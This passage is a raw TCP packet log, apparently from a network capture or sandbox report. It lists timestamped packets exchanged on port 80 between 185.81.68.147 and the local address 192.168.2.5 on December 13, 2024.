Dec 13, 2024 01:37:10.495996952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.496088028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.496718884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.496851921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.496897936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.497627020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.497750044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.497792006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.498528004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.498662949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.498703957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.499485016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.499622107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.499664068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.500386953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.500572920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.500669003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.501279116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.501456022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.501547098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.502240896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.502257109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.502298117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.503122091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.503221989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.503289938 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.503993988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.504137039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.504179001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.504916906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.504971027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.505012989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.505815029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.505951881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.506047010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.506728888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.506839037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.506884098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.507659912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.507755041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.507798910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.508549929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.508670092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.508712053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.509483099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.509589911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.509629965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.510370970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.510483027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.510580063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.511285067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.511409998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.511502028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.512181044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.512295961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.512341976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.513118982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.513226986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.513290882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.514065981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.514139891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.514180899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.514941931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.515047073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.515089989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.515820980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.515944958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.516033888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.516772985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.516901970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.516944885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.517668009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.517748117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.517786980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.518564939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.518668890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.518712044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.519462109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.519572020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.519613981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.520379066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.520469904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.520517111 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.521362066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.521507978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.521552086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.522186995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.522317886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.522358894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.523102999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.523284912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.523351908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.524019957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.524127007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.524167061 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.525029898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.525185108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.525228977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.525815964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.525949001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.525998116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.526741028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.526839018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.526882887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.527662992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.527923107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.527964115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.528563976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.528772116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.528817892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.529459953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.529650927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.529691935 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.530401945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.530510902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.530553102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.531286001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.531411886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.531455040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.532195091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.532356977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.532397985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.533119917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.533221960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.533263922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.534028053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.534121990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.534167051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.534938097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.535042048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.535093069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.535859108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.535989046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.536086082 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.536760092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.536935091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.536978006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.537661076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.537770033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.537812948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.538562059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.538757086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.538799047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.539494038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.539635897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.539679050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.540381908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.583086014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.684994936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.685070038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.685174942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.685406923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.685472965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.685565948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.686302900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.686405897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.686496973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.687194109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.687305927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.687396049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.688168049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.688225985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.688323021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.689043999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.689116001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.689203978 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.689934015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.690006971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.690099001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.690866947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.690988064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.691077948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.691756010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.691879034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.691970110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.692671061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.692799091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.692893982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.693587065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.693701029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.693753958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.694480896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.694614887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.694706917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.695386887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.695516109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.695616961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.696300030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.696410894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.696505070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.697220087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.697344065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.697431087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.698133945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.698265076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.698353052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.699071884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.699198008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.699285984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.699965954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.700054884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.700144053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.700846910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.700997114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.701091051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.701801062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.701919079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.702028036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.702688932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.702756882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.702843904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.703591108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.703692913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.703784943 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.704488993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.704549074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.704642057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.705388069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.705557108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.705646992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.706295967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.706396103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.706485987 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.707195997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.707298994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.707389116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.708187103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.708311081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.708431959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.709155083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.709208965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.709263086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.709947109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.710046053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.710139990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.710882902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.711055994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.711148977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.711782932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.711920977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.712009907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.712660074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.712737083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.712829113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.713617086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.713709116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.713804960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.714510918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.714632988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.714721918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.715403080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.715549946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.715636969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.716326952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.716432095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.716531038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.717211962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.717318058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.717406034 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.718132973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.718230963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.718322039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.719031096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.719142914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.719233036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.719954967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.720067978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.720158100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.720863104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.721003056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.721093893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.721759081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.721899033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.721987963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.722662926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.722805023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.722893953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.723581076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.723685026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.723773956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.724490881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.724562883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.724611998 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.725398064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.725590944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.725687981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.726376057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.726475954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.726562023 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.727241993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.727354050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.727443933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.728159904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.728243113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.728343964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.729033947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.729165077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.729253054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.729945898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.730153084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.730247974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.730859995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.731050968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.731141090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.731789112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.731899023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.731992006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.732631922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.785981894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.877125025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.877145052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.877245903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.877443075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.877533913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.877605915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.878262043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.878376961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.878458977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.879173040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.879297018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.879368067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.880074024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.880201101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.880275965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.880995989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.881117105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.881186962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.881932020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.882025957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.882095098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.882790089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.882898092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.882967949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.883724928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.883822918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.883893013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.884634972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.884752989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.884823084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.885560989 CET	80	49707	185.81.68.147	192.168.2.5
